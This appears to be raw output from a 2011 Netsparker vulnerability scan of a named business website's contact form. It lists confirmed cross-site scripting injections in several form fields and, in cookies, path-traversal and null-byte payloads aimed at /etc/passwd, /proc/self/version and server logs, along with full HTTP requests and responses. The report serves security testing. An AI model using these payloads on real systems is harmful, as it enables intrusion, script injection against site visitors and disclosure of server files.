OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 261
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

button=Submit&captchaString=3&comments=3&company=3&email=netsparker%40example.com&firstName=Smith&lastName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000BF9)%3c%2fscript%3e&leadCategory=3&phone=3&subCategoryId=-1&url=3&value=3&yourInterest=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:35:24 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=35A6491C8ABBD42766BE4CA45EF42401; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, contact, email"/> <meta name="description" content="Getting in touch with the InsideUp team"/> <meta name="robots" content="index; follow"/> <title>Contact us and send your feedback.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> 
<option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." 
>Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" 
src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('ContactUs',0,'')" alt="Contact Us" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerContactusActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script>
var RecaptchaOptions = {
theme :'custom',
lang :'en',
custom_theme_widget :'recaptcha_widget'
};
</script><div style="background:#eeeeee;"> <table width="902" border="0" align="center" cellpadding="0" cellspacing="0" style="background:url(images/ContectBgImg.png) repeat-y top;"> <tr> <td width="596"> <form method="post" action="contactUs.html"> <input type="hidden" id="value" name="value" value="3" /> <input type="hidden" id="subCategoryId" name="subCategoryId" value="-1" /> <table width="568" border="0" align="right" cellpadding="0" cellspacing="0">
<tr> <td height="84" colspan="2" style="font:bold 24px Arial, Helvetica, sans-serif; color:#2564c7;">Contact Us</td> </tr> <tr> <td colspan="2" style="border-top:1px solid #eaeaea; border-bottom:1px solid #eaeaea;"> <table width="539" border="0" align="left" cellspacing="0" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121; margin:10px 0 15px 0;"> <tr> <td width="257" height="40" align="right">First Name&nbsp;&nbsp; <input type="text" value="Smith" name="firstName" id="firstName" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> <td width="278" align="right">Last Name&nbsp;&nbsp; <input type="text" value="'"--></style></script><script>netsparker(0x000BF9)</script>" name="lastName" id="lastName" style="width:160px; border:1px groove #c3c3c3;" class=" formError" /> </td> </tr> <tr> <td height="40" align="right">Email&nbsp;&nbsp; <input type="text" value="netsparker@example.com" name="email" id="email" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> <td align="right">Phone&nbsp;&nbsp; <input type="text" value="3" name="phone" id="phone" style="width:160px; border:1px groove #c3c3c3;" class="formError" /> </td> </tr> <tr> <td height="40" align="right">Company&nbsp;&nbsp; <input type="text" value="3" name="company" id="company" style="width:160px; border:1px groove #c3c3c3;" class=""/> </td> <td align="right"> Your Interest&nbsp;&nbsp; <select value="3" name="yourInterest" id="yourInterest" style="width:160px; border:1px groove #c3c3c3;"> <option>Media Relations</option> <option>Buy Leads</option> <option>Customer Service</option> <option>Investor Relations</option> <option>Partner</option> </select> </td> </tr> <tr> <td align="right">Lead Category&nbsp;&nbsp; <select name="leadCategory" id="leadCategory" class='' style="width:160px;"> <option selected="selected" value="3"></option> </select> </td> <td height="40" align="right">Company URL&nbsp;&nbsp; <input type="text" value="3" name="url" id="url" 
style="width:160px; border:1px groove #c3c3c3;" class=""/> </td> </tr> </table> </td> </tr> <tr> <td width="95" height="115" align="right" valign="top" style="padding:25px 0 0 0; font:normal 12px Arial, Helvetica, sans-serif; padding-right:2px;">Comments&nbsp;&nbsp; </td> <t..
- /contactUs.html

/contactUs.html CONFIRMED

http://www.insideup.com/contactUs.html

Parameters

Parameter Type Value
button POST Submit
captchaString POST 3
comments POST 3
company POST 3
email POST netsparker@example.com
firstName POST Smith
lastName POST Smith
leadCategory POST '"--></style></script><script>alert(0x000C1B)</script>
phone POST 3
subCategoryId POST -1
url POST 3
value POST 3
yourInterest POST 3

Request

POST /contactUs.html HTTP/1.1
Referer: http://www.insideup.com/contactUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Content-Length: 265
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

button=Submit&captchaString=3&comments=3&company=3&email=netsparker%40example.com&firstName=Smith&lastName=Smith&leadCategory='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000C1B)%3c%2fscript%3e&phone=3&subCategoryId=-1&url=3&value=3&yourInterest=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:35:35 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=A47EAEBF4799404E1E4B7B95728C0353; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


- /contactUs.html

/contactUs.html CONFIRMED

http://www.insideup.com/contactUs.html

Parameters

Parameter Type Value
button POST Submit
captchaString POST 3
comments POST 3
company POST 3
email POST netsparker@example.com
firstName POST Smith
lastName POST Smith
leadCategory POST 3
phone POST '"--></style></script><script>alert(0x000C57)</script>
subCategoryId POST -1
url POST 3
value POST 3
yourInterest POST 3

Request

POST /contactUs.html HTTP/1.1
Referer: http://www.insideup.com/contactUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Content-Length: 265
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

button=Submit&captchaString=3&comments=3&company=3&email=netsparker%40example.com&firstName=Smith&lastName=Smith&leadCategory=3&phone='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000C57)%3c%2fscript%3e&subCategoryId=-1&url=3&value=3&yourInterest=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:35:50 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=9D8F753307D6CD45B89C5214D0D161AA; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


- /contactUs.html

/contactUs.html CONFIRMED

http://www.insideup.com/contactUs.html

Parameters

Parameter        Type   Value
button           POST   Submit
captchaString    POST   3
comments         POST   3
company          POST   3
email            POST   netsparker@example.com
firstName        POST   Smith
lastName         POST   Smith
leadCategory     POST   3
phone            POST   3
subCategoryId    POST   -1
url              POST   '"--></style></script><script>alert(0x000CE8)</script>
value            POST   3
yourInterest     POST   3

Request

POST /contactUs.html HTTP/1.1
Referer: http://www.insideup.com/contactUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 265
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

button=Submit&captchaString=3&comments=3&company=3&email=netsparker%40example.com&firstName=Smith&lastName=Smith&leadCategory=3&phone=3&subCategoryId=-1&url='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000CE8)%3c%2fscript%3e&value=3&yourInterest=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:36:05 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=01F25BD067D0ECEE185EF9A74EAE3B30; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, contact, email"/> <meta name="description" content="Getting in touch with the InsideUp team"/> <meta name="robots" content="index; follow"/> <title>Contact us and send your feedback.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> 
